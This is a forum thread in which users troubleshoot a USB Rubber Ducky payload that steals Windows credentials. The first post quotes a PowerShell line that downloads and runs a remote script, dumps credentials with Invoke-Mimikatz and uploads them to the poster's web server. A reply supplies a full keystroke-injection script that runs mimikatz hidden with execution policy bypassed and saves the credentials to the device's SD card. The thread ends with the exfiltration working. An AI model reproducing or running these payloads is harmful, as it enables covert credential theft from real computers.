Jump to content

Help with Output


Exmix
 Share

Recommended Posts

So messing with this Payload I found here: https://www.hak5.org/blog/15-second-password-hack-mr-robot-style

I got it all working up to the point where it tries to output the file back to my Web Server. I get an error that says:
 

Exception calling "UploadString" with "2" argument(s): "The remote server returned and error: (405) Method not allowed."

At line:1 char:156

+ IEX (New-Object Net.WebClient).DownloadString('Http://MyWebServer/im.ps1'): $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString <<<< ('Http://MyWebServer/rx.php', $output)

+CategoryInfo : NotSpecified: (:) []. MethodInvocationException

+FullyQualifiedErrorID : DotNetMethodException

So I was looking into this error for a while and I can't really find much on how to fix this. My WebServer is Windows 2012 R2. I was wondering if anyone could help me fix this part here possibly OR help with how to just output it to a .txt file or something on the SD Card since I have my duck as the TwinDuck.

Link to comment
Share on other sites

Are you sure that php is enabled in your apache or IIS webserver?

try to place a php file e.g test.php in the webdirectory root with the following content:

<?php
phpinfo();
?>

if you now visit yourwebserver/test.php you should see a table with some information if php is enabled.

 

I use this to run mimikatz from sdcard/exec/mimikatz.ps1 and save the content to sdcard/data/mimikatz

REM -------------------------------------------------------------------------------------
REM Get drive letter of drive with label DUCKY
REM -------------------------------------------------------------------------------------
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d
ENTER
DELAY 500
REM -------------------------------------------------------------------------------------
REM Copy and execute Invoke Mimikatz
REM -------------------------------------------------------------------------------------
STRING if exist %duck%\exec\mimikatz.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\exec\mimikatz.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\data\mimikatz\%computername%_creds.txt';"

Make sure that sdcard/exec/mimikatz.ps1 and the folder sdcard/data/mimikatz exist.

Link to comment
Share on other sites

10 hours ago, ThoughtfulDev said:

Are you sure that php is enabled in your apache or IIS webserver?

try to place a php file e.g test.php in the webdirectory root with the following content:


<?php
phpinfo();
?>

if you now visit yourwebserver/test.php you should see a table with some information if php is enabled.

 

I use this to run mimikatz from sdcard/exec/mimikatz.ps1 and save the content to sdcard/data/mimikatz


REM -------------------------------------------------------------------------------------
REM Get drive letter of drive with label DUCKY
REM -------------------------------------------------------------------------------------
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d
ENTER
DELAY 500
REM -------------------------------------------------------------------------------------
REM Copy and execute Invoke Mimikatz
REM -------------------------------------------------------------------------------------
STRING if exist %duck%\exec\mimikatz.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\exec\mimikatz.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\data\mimikatz\%computername%_creds.txt';"

Make sure that sdcard/exec/mimikatz.ps1 and the folder sdcard/data/mimikatz exist.

Wow, I feel so silly. That's the one thing I didn't check... I got it running on there with no issues as soon as I Installed and enabled php. Thank you so much.

 

Also I like your script as well, i'll grab that and save it for when I wanna try that. Seems simpler and doesn't require internet connection.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...